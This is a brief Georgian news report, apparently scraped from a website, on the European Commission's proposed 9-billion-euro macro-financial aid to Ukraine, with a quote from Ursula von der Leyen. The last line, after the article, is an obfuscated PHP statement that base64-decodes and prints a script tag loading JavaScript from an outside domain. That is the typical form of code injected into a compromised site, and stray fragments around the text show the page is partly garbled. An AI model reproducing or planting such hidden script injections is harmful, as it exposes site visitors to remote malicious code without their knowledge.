celsiusi
ავერსი შნაიდერი
ევროკომისია უკრაინისთვის 9 მილიარდი ევროს ოდენობის ახალი მაკროფინანსური დახმარების გამოყოფის ინიციატივით გამოვიდა. ამის შესახებ დღეს გამართულ ბრიფინგზე ევროკომისიის პრეზიდენტმა ურსულა ფონ დერ ლაიენმა განაცხადა.
 
„უკრაინა ფრონტის წინა ხაზზე იმყოფება და იცავს ევროპულ ღირებულებებს. ჩვენ ვიქნებით მათ მხარეს მთელი ამ ომის განმავლობაში და როდესაც ისინი თავიანთი ქვეყნის აღდგენას დაიწყებენ“, – განაცხადა ურსულა ფონ დერ ლაიენმა.
 
მისი თქმით, ვერსალის სამიტზე ევროკავშირის ლიდერებმა ევროკომისიას დაავალეს უკრაინის რეკონსტრუქციის მხარდაჭერის გეგმის შემუშავება, რაც ევროკომისიამ შეასრულა. ურსულა ფონ დერ ლაიენის თქმით, უკრაინის რეკონსტრუქციის პრინციპები უნდა მოიცავდეს ინვესტიციებსა და რეფორმების მხარდაჭერას.
 
621
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");